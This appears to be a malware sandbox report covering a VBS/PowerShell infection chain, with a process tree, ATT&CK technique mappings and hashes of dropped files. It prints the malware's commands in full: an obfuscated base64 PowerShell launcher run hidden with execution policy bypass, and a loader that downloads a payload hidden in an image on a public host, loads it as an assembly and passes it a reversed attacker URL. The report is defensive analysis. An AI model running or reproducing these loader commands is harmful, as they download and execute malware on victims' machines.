❠ ❘Z⤙ ⧺ ¤ ❠ ❘Bl⤙ ⧺ ¤ ❠ ❘Hg⤙ ⧺ ¤ ❠ ❘Ow⤙ ⧺ ¤ ❠ ❘k⤙ ⧺ ¤ ❠ ❘HM⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘Bh⤙ ⧺ ¤ ❠ ❘HI⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘BJ⤙ ⧺ ¤ ❠ ❘G4⤙ ⧺ ¤ ❠ ❘Z⤙ ⧺ ¤ ❠ ❘Bl⤙ ⧺ ¤ ❠ ❘Hg⤙ ⧺ ¤ ❠ ❘I⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘r⤙ ⧺ ¤ ❠ ❘D0⤙ ⧺ ¤ ❠ ❘I⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘k⤙ ⧺ ¤ ❠ ❘HM⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘Bh⤙ ⧺ ¤ ❠ ❘HI⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘BG⤙ ⧺ ¤ ❠ ❘Gw⤙ ⧺ ¤ ❠ ❘YQBn⤙ ⧺ ¤ ❠ ❘C4⤙ ⧺ ¤ ❠ ❘T⤙ ⧺ ¤ ❠ ❘Bl⤙ ⧺ ¤ ❠ ❘G4⤙ ⧺ ¤ ❠ ❘ZwB0⤙ ⧺ ¤ ❠ ❘Gg⤙ ⧺ ¤ ❠ ❘Ow⤙ ⧺ ¤ ❠ ❘k⤙ ⧺ ¤ ❠ ❘GI⤙ ⧺ ¤ ❠ ❘YQBz⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘Ng⤙ ⧺ ¤ ❠ ❘0⤙ ⧺ ¤ ❠ ❘Ew⤙ ⧺ ¤ ❠ ❘ZQBu⤙ ⧺ ¤ ❠ ❘Gc⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘Bo⤙ ⧺ ¤ ❠ ❘C⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘PQ⤙ ⧺ ¤ ❠ ❘g⤙ ⧺ ¤ ❠ ❘CQ⤙ ⧺ ¤ ❠ ❘ZQBu⤙ ⧺ ¤ ❠ ❘GQ⤙ ⧺ ¤ ❠ ❘SQBu⤙ ⧺ ¤ ❠ ❘GQ⤙ ⧺ ¤ ❠ ❘ZQB4⤙ ⧺ ¤ ❠ ❘C⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘LQ⤙ ⧺ ¤ ❠ ❘g⤙ ⧺ ¤ ❠ ❘CQ⤙ ⧺ ¤ ❠ ❘cwB0⤙ ⧺ ¤ ❠ ❘GE⤙ ⧺ ¤ ❠ ❘cgB0⤙ ⧺ ¤ ❠ ❘Ek⤙ ⧺ ¤ ❠ ❘bgBk⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘e⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘7⤙ ⧺ ¤ ❠ ❘CQ⤙ ⧺ ¤ ❠ ❘YgBh⤙ ⧺ ¤ ❠ ❘HM⤙ ⧺ ¤ ❠ ❘ZQ⤙ ⧺ ¤ ❠ ❘2⤙ ⧺ ¤ ❠ ❘DQ⤙ ⧺ ¤ ❠ ❘QwBv⤙ ⧺ ¤ ❠ ❘G0⤙ ⧺ ¤ ❠ ❘bQBh⤙ ⧺ ¤ ❠ ❘G4⤙ ⧺ ¤ ❠ ❘Z⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘g⤙ ⧺ ¤ ❠ ❘D0⤙ ⧺ ¤ ❠ ❘I⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘k⤙ ⧺ ¤ ❠ ❘Gk⤙ ⧺ ¤ ❠ ❘bQBh⤙ ⧺ ¤ ❠ ❘Gc⤙ ⧺ ¤ ❠ ❘ZQBU⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘e⤙ ⧺ ¤ ❠ ❘B0⤙ ⧺ ¤ ❠ ❘C4⤙ ⧺ ¤ ❠ ❘UwB1⤙ ⧺ ¤ ❠ ❘GI⤙ ⧺ ¤ ❠ ❘cwB0⤙ ⧺ ¤ ❠ ❘HI⤙ ⧺ ¤ ❠ ❘aQBu⤙ ⧺ ¤ ❠ ❘Gc⤙ ⧺ ¤ ❠ ❘K⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘k⤙ ⧺ ¤ ❠ ❘HM⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘Bh⤙ ⧺ ¤ ❠ ❘HI⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘BJ⤙ ⧺ ¤ ❠ ❘G4⤙ ⧺ ¤ ❠ ❘Z⤙ ⧺ ¤ ❠ ❘Bl⤙ ⧺ ¤ ❠ ❘Hg⤙ ⧺ ¤ ❠ ❘L⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘g⤙ ⧺ ¤ ❠ ❘CQ⤙ ⧺ ¤ ❠ ❘YgBh⤙ ⧺ ¤ ❠ ❘HM⤙ ⧺ ¤ ❠ ❘ZQ⤙ ⧺ ¤ ❠ ❘2⤙ ⧺ ¤ ❠ ❘DQ⤙ ⧺ ¤ ❠ ❘T⤙ ⧺ ¤ ❠ ❘Bl⤙ ⧺ ¤ ❠ ❘G4⤙ ⧺ ¤ ❠ ❘ZwB0⤙ ⧺ ¤ ❠ ❘Gg⤙ ⧺ ¤ ❠ ❘KQ⤙ ⧺ ¤ ❠ ❘7⤙ ⧺ ¤ ❠ ❘CQ⤙ ⧺ ¤ ❠ ❘YwBv⤙ ⧺ ¤ ❠ ❘G0⤙ ⧺ ¤ ❠ ❘bQBh⤙ ⧺ ¤ ❠ ❘G4⤙ ⧺ ¤ ❠ ❘Z⤙ ⧺ ¤ ❠ ❘BC⤙ ⧺ ¤ ❠ ❘Hk⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘Bl⤙ ⧺ ¤ ❠ ❘HM⤙ ⧺ ¤ ❠ ❘I⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘9⤙ ⧺ ¤ ❠ ❘C⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘WwBT⤙ ⧺ ¤ ❠ ❘Hk⤙ ⧺ ¤ ❠ ❘cwB0⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘bQ⤙ ⧺ ¤ ❠ ❘u⤙ ⧺ ¤ ❠ ❘EM⤙ ⧺ ¤ ❠ ❘bwBu⤙ ⧺ ¤ ❠ ❘HY⤙ ⧺ ¤ ❠ ❘ZQBy⤙ ⧺ ¤ ❠ ❘HQ⤙ ⧺ ¤ ❠ ❘XQ⤙ ⧺ ¤ ❠ ❘6⤙ ⧺ ¤ ❠ ❘Do⤙ ⧺ ¤ ❠ ❘RgBy⤙ ⧺ ¤ ❠ ❘G8⤙ ⧺ ¤ ❠ ❘bQBC⤙ ⧺ ¤ ❠ ❘GE⤙ ⧺ ¤ ❠ ❘cwBl⤙ ⧺ ¤ ❠ ❘DY⤙ ⧺ ¤ ❠ ❘N⤙ ⧺ ¤ ❠ ❘BT⤙ ⧺ ¤ ❠ ❘HQ⤙ ⧺ ¤ ❠ ❘cgBp⤙ ⧺ ¤ ❠ ❘G4⤙ ⧺ ¤ ❠ ❘Zw⤙ ⧺ ¤ ❠ ❘o⤙ ⧺ ¤ ❠ ❘CQ⤙ ⧺ ¤ ❠ ❘YgBh⤙ ⧺ ¤ ❠ ❘HM⤙ ⧺ ¤ ❠ ❘ZQ⤙ ⧺ ¤ ❠ ❘2⤙ ⧺ ¤ ❠ ❘DQ⤙ ⧺ ¤ ❠ ❘QwBv⤙ ⧺ ¤ ❠ ❘G0⤙ ⧺ ¤ ❠ ❘bQBh⤙ ⧺ ¤ ❠ ❘G4⤙ ⧺ ¤ ❠ ❘Z⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘p⤙ ⧺ ¤ ❠ ❘Ds⤙ ⧺ ¤ ❠ ❘J⤙ ⧺ ¤ ❠ ❘Bs⤙ ⧺ ¤ ❠ ❘G8⤙ ⧺ ¤ ❠ ❘YQBk⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘Z⤙ ⧺ ¤ ❠ ❘BB⤙ ⧺ ¤ ❠ ❘HM⤙ ⧺ ¤ ❠ ❘cwBl⤙ ⧺ ¤ ❠ ❘G0⤙ ⧺ ¤ ❠ ❘YgBs⤙ ⧺ ¤ ❠ ❘Hk⤙ ⧺ ¤ ❠ ❘I⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘9⤙ ⧺ ¤ ❠ ❘C⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘WwBT⤙ ⧺ ¤ ❠ ❘Hk⤙ ⧺ ¤ ❠ ❘cwB0⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘bQ⤙ ⧺ ¤ ❠ ❘u⤙ ⧺ ¤ ❠ ❘FI⤙ ⧺ ¤ ❠ ❘ZQBm⤙ ⧺ ¤ ❠ ❘Gw⤙ ⧺ ¤ ❠ ❘ZQBj⤙ ⧺ ¤ ❠ ❘HQ⤙ ⧺ ¤ ❠ ❘aQBv⤙ ⧺ ¤ ❠ ❘G4⤙ ⧺ ¤ ❠ ❘LgBB⤙ ⧺ ¤ ❠ ❘HM⤙ ⧺ ¤ ❠ ❘cwBl⤙ ⧺ ¤ ❠ ❘G0⤙ ⧺ ¤ ❠ ❘YgBs⤙ ⧺ ¤ ❠ ❘Hk⤙ ⧺ ¤ ❠ ❘XQ⤙ ⧺ ¤ ❠ ❘6⤙ ⧺ ¤ ❠ ❘Do⤙ ⧺ ¤ ❠ ❘T⤙ ⧺ ¤ ❠ ❘Bv⤙ ⧺ ¤ ❠ ❘GE⤙ ⧺ ¤ ❠ ❘Z⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘o⤙ ⧺ ¤ ❠ ❘CQ⤙ ⧺ ¤ ❠ ❘YwBv⤙ ⧺ ¤ ❠ ❘G0⤙ ⧺ ¤ ❠ ❘bQBh⤙ ⧺ ¤ ❠ ❘G4⤙ ⧺ ¤ ❠ ❘Z⤙ ⧺ ¤ ❠ ❘BC⤙ ⧺ ¤ ❠ ❘Hk⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘Bl⤙ ⧺ ¤ ❠ ❘HM⤙ ⧺ ¤ ❠ ❘KQ⤙ ⧺ ¤ ❠ ❘7⤙ ⧺ ¤ ❠ ❘CQ⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘B5⤙ ⧺ ¤ ❠ ❘H⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘ZQ⤙ ⧺ ¤ ❠ ❘g⤙ ⧺ ¤ ❠ ❘D0⤙ ⧺ ¤ ❠ ❘I⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘k⤙ ⧺ ¤ ❠ ❘Gw⤙ ⧺ ¤ ❠ ❘bwBh⤙ ⧺ ¤ ❠ ❘GQ⤙ ⧺ ¤ ❠ ❘ZQBk⤙ ⧺ ¤ ❠ ❘EE⤙ ⧺ ¤ ❠ ❘cwBz⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘bQBi⤙ ⧺ ¤ ❠ ❘Gw⤙ ⧺ ¤ ❠ ❘eQ⤙ ⧺ ¤ ❠ ❘u⤙ ⧺ ¤ ❠ ❘Ec⤙ ⧺ ¤ ❠ ❘ZQB0⤙ ⧺ ¤ ❠ ❘FQ⤙ ⧺ ¤ ❠ ❘eQBw⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘K⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘n⤙ ⧺ ¤ ❠ ❘GQ⤙ ⧺ ¤ ❠ ❘bgBs⤙ ⧺ ¤ ❠ ❘Gk⤙ ⧺ ¤ ❠ ❘Yg⤙ ⧺ ¤ ❠ ❘u⤙ ⧺ ¤ ❠ ❘Ek⤙ ⧺ ¤ ❠ ❘Tw⤙ ⧺ ¤ ❠ ❘u⤙ ⧺ ¤ ❠ ❘Eg⤙ ⧺ ¤ ❠ ❘bwBt⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘Jw⤙ ⧺ ¤ ❠ ❘p⤙ ⧺ ¤ ❠ ❘Ds⤙ ⧺ ¤ ❠ ❘J⤙ ⧺ ¤ ❠ ❘Bt⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘Bo⤙ ⧺ ¤ ❠ ❘G8⤙ ⧺ ¤ ❠ ❘Z⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘g⤙ ⧺ ¤ ❠ ❘D0⤙ ⧺ ¤ ❠ ❘I⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘k⤙ ⧺ ¤ ❠ ❘HQ⤙ ⧺ ¤ ❠ ❘eQBw⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘LgBH⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘BN⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘Bo⤙ ⧺ ¤ ❠ ❘G8⤙ ⧺ ¤ ❠ ❘Z⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘o⤙ ⧺ ¤ ❠ ❘Cc⤙ ⧺ ¤ ❠ ❘VgBB⤙ ⧺ ¤ ❠ ❘Ek⤙ ⧺ ¤ ❠ ❘Jw⤙ ⧺ ¤ ❠ ❘p⤙ ⧺ ¤ ❠ ❘C4⤙ ⧺ ¤ ❠ ❘SQBu⤙ ⧺ ¤ ❠ ❘HY⤙ ⧺ ¤ ❠ ❘bwBr⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘K⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘k⤙ ⧺ ¤ ❠ ❘G4⤙ ⧺ ¤ ❠ ❘dQBs⤙ ⧺ ¤ ❠ ❘Gw⤙ ⧺ ¤ ❠ ❘L⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘g⤙ ⧺ ¤ ❠ ❘Fs⤙ ⧺ ¤ ❠ ❘bwBi⤙ ⧺ ¤ ❠ ❘Go⤙ ⧺ ¤ ❠ ❘ZQBj⤙ ⧺ ¤ ❠ ❘HQ⤙ ⧺ ¤ ❠ ❘WwBd⤙ ⧺ ¤ ❠ ❘F0⤙ ⧺ ¤ ❠ ❘I⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘o⤙ ⧺ ¤ ❠ ❘Cc⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘B4⤙ ⧺ ¤ ❠ ❘HQ⤙ ⧺ ¤ ❠ ❘LgBG⤙ ⧺ ¤ ❠ ❘EQ⤙ ⧺ ¤ ❠ ❘Vw⤙ ⧺ ¤ ❠ ❘v⤙ ⧺ ¤ ❠ ❘HU⤙ ⧺ ¤ ❠ ❘ZQBt⤙ ⧺ ¤ ❠ ❘C8⤙ ⧺ ¤ ❠ ❘c⤙ ⧺ ¤ ❠ ❘Bw⤙ ⧺ ¤ ❠ ❘G0⤙ ⧺ ¤ ❠ ❘YQB4⤙ ⧺ ¤ ❠ ❘C8⤙ ⧺ ¤ ❠ ❘NQ⤙ ⧺ ¤ ❠ ❘1⤙ ⧺ ¤ ❠ ❘DE⤙ ⧺ ¤ ❠ ❘Lg⤙ ⧺ ¤ ❠ ❘z⤙ ⧺ ¤ ❠ ❘Dk⤙ ⧺ ¤ ❠ ❘MQ⤙ ⧺ ¤ ❠ ❘u⤙ ⧺ ¤ ❠ ❘DM⤙ ⧺ ¤ ❠ ❘Lg⤙ ⧺ ¤ ❠ ❘y⤙ ⧺ ¤ ❠ ❘Dk⤙ ⧺ ¤ ❠ ❘MQ⤙ ⧺ ¤ ❠ ❘v⤙ ⧺ ¤ ❠ ❘C8⤙ ⧺ ¤ ❠ ❘OgBw⤙ ⧺ ¤ ❠ ❘HQ⤙ ⧺ ¤ ❠ ❘d⤙ ⧺ ¤ ❠ ❘Bo⤙ ⧺ ¤ ❠ ❘Cc⤙ ⧺ ¤ ❠ ❘I⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘s⤙ ⧺ ¤ ❠ ❘C⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘JwBk⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘cwBh⤙ ⧺ ¤ ❠ ❘HQ⤙ ⧺ ¤ ❠ ❘aQB2⤙ ⧺ ¤ ❠ ❘GE⤙ ⧺ ¤ ❠ ❘Z⤙ ⧺ ¤ ❠ ❘Bv⤙ ⧺ ¤ ❠ ❘Cc⤙ ⧺ ¤ ❠ ❘I⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘s⤙ ⧺ ¤ ❠ ❘C⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘JwBk⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘cwBh⤙ ⧺ ¤ ❠ ❘HQ⤙ ⧺ ¤ ❠ ❘aQB2⤙ ⧺ ¤ ❠ ❘GE⤙ ⧺ ¤ ❠ ❘Z⤙ ⧺ ¤ ❠ ❘Bv⤙ ⧺ ¤ ❠ ❘Cc⤙ ⧺ ¤ ❠ ❘I⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘s⤙ ⧺ ¤ ❠ ❘C⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘JwBk⤙ ⧺ ¤ ❠ ❘GU⤙ ⧺ ¤ ❠ ❘cwBh⤙ ⧺ ¤ ❠ ❘HQ⤙ ⧺ ¤ ❠ ❘aQB2⤙ ⧺ ¤ ❠ ❘GE⤙ ⧺ ¤ ❠ ❘Z⤙ ⧺ ¤ ❠ ❘Bv⤙ ⧺ ¤ ❠ ❘Cc⤙ ⧺ ¤ ❠ ❘L⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘n⤙ ⧺ ¤ ❠ ❘FI⤙ ⧺ ¤ ❠ ❘ZQBn⤙ ⧺ ¤ ❠ ❘EE⤙ ⧺ ¤ ❠ ❘cwBt⤙ ⧺ ¤ ❠ ❘Cc⤙ ⧺ ¤ ❠ ❘L⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘n⤙ ⧺ ¤ ❠ ❘Cc⤙ ⧺ ¤ ❠ ❘KQ⤙ ⧺ ¤ ❠ ❘p⤙ ⧺ ¤ ❠ ❘⤙ ⧺ ¤ ❠ ❘==';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('⤙ ⧺ ¤ ❠ ❘','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2196
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FDW/uem/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1984

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES930D.tmp

Filesize
1KB

MD5
5e3c0be7bc5c807ac2868d2b2e7b3577

SHA1
ceec0a35075e10e6b477547957147c8561fe8588

SHA256
c8f8e8bb01b3192357ee3839739038e0066a06ff4338a2db116430bd4041ca49

SHA512
ce9fe34b25bfcdfd4ddaba48891c9f2b8e41f9748cbf3a4bb1d2158dbb4baa8b6ef55c46bbbb8ed037d2c0fb5893b9bb707463a06b8c9391835cdee66f84ea21

Download Submit
C:\Users\Admin\AppData\Local\Temp\gda0rpyd.dll

Filesize
3KB

MD5
47f291e5c0817c13e14c6873c2b521e0

SHA1
22d74a050ecb0833de56f82f4592ae348af03323

SHA256
b1e73843a2e67cae51fc67289d4ad52ae86bf2b31813c0c58676f9cd880c6dfb

SHA512
b5413371629db5024a9d3f1a11b561b616834b97bde54f307628f89f74f4cc6b8ce30832f029a20863b4274c84edb05ab77ba697ba6f252aeb2533e4f8f9fc97

Download Submit
C:\Users\Admin\AppData\Local\Temp\gda0rpyd.pdb

Filesize
7KB

MD5
c1128961c5324863a4a68f60735075e2

SHA1
f238b2c7f81a137e53608178fd8e5b6c68c1c0c5

SHA256
b2e66020911c70fcaac924a7b968415eed0afeac596357f0bb6cf5420caa2e9f

SHA512
ab478da2a563c60128b5bde9b58c8e01f928b42d67607d2b8231ab4f70f83e3b21ab04ce3e4e46b9ebc44b4d9b3e4f2334fb264276f37606e1af9ad62498de48

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
c666668060bc810c53d38b6ca9912123

SHA1
7317198adbf06e320ac5bb32264e90f97f62db73

SHA256
10ce8a00dd8a8120e0092b1351606b885400048186a4f9fff8a94d0bcfdb697d

SHA512
08d2f6477b06990f53c482e9463831d034185a5301047701e09baf292b0a7e23c1571fc83deb848d3f68b91882eb842666fe725e323513d83e8af71d30922915

Download Submit
C:\Users\Admin\AppData\Roaming\createdbeautyinbuttersochbiscu.vBS

Filesize
178KB

MD5
2d27a0bd722c6d90ffaf96bc5d13a221

SHA1
370c2797149c7a464736e1050a6938ff7ee28182

SHA256
f8cb30a8967777e0a08a3ec434600c5d6585140769eab1faf6de9b118934817a

SHA512
5233909650d26ad19b4299d8c9363a66b390e319e61b7a33ac8422819e39efc9d09390d68ecb0ce97b33ee417239a85aee058b5beb5992aea671bf591fe4712f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC930C.tmp

Filesize
652B

MD5
ba7390a5100c962241b4cde9ce77ed91

SHA1
98d2f2b50440f0d703dc459aab21fa4fa278d03d

SHA256
9ed550ce41a0538a3a3b51a49574ef54ad421fcd2a43ac151f2714f458aa5031

SHA512
7a438c964764a483d3fb09840402bfd95cc6361c20e91b7f003e0dba694450f3d7fbd94649f2ef670acb21bfa031e5e650dfaf4135e8910e51c8927e3b858640

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gda0rpyd.0.cs

Filesize
463B

MD5
e61a70cd7f2f76bc31cfb5d74d0078be

SHA1
978d2901147a8ace467d19e812addd39a260d1a0

SHA256
5eabc9f6f6cfad951ba0df6d7cecd689f6c2a2d272d5dc644b37aab318168d87

SHA512
8bc8f7028ee578505f50bde6be3fef24807bcd68c4cd6fec6165c6b6765eaf50ab2065d9ea9ac39eeb8f62046ddc778e623a150d07b74dd58f59231f63dde189

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gda0rpyd.cmdline

Filesize
309B

MD5
5de157579a91dca676a23de209c9dd2f

SHA1
e8831d42e80422654b7c92aadfc4ebcb3001ec25

SHA256
c7f2f95404e71f1312915ec0d077eadf80e96e6ea7cb2290bfee4fee3466fec6

SHA512
3e29e34c336df65621ef411413979a4d30df76a52df87e40d778f97a3f7fb4d930e89e685b2925cc53b01135fd06a975ba0807f0ca8bd383866854c1da8470ca

Download Submit